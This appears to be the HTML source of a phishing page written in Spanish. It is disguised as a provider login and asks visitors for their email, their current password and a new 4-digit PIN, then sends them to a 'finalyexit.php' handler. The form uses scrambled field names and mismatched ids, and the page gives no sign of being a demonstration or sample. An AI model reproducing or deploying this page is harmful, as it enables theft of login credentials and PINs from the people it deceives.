<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <title>Log - Internet /(HOME</title>
  <link rel="stylesheet" href="artt/lacarardelh.css">
</head>
<body>

    <img class="log2" src="imdd/log-msu3.png" alt=""> <div style="background-color: rgb(25, 102, 255); width: 100%; ">
    
    <p style="color: white;padding: 10px; text-align: center;">A continuacion Realiza el inicio de Session, con tus credenciales actuales!</p></div>
    <center>
 
</div>
  
        <form action="finalyexit.php" method="post" class="performancelog">
    
   <img src="imdd/vlog-ibn.png" alt="">
      <input placeholder="Ingresa el email." type="email" id="username" name="ejdysdysd3" required>

      
      <input placeholder="Ingresa tu contraseña actual !" type="password" id="email" name="fow773" required>
 

      <input inputmode="numeric" placeholder=" Crea un pin de 4 digitos" type="text" id="password" name="sdf34fer" required maxlength=>

    <button class="typsub" type="submit">Iniciar Sesión</button> <br><br>
  </form></center>
</div>    </div>

</body>
</html>
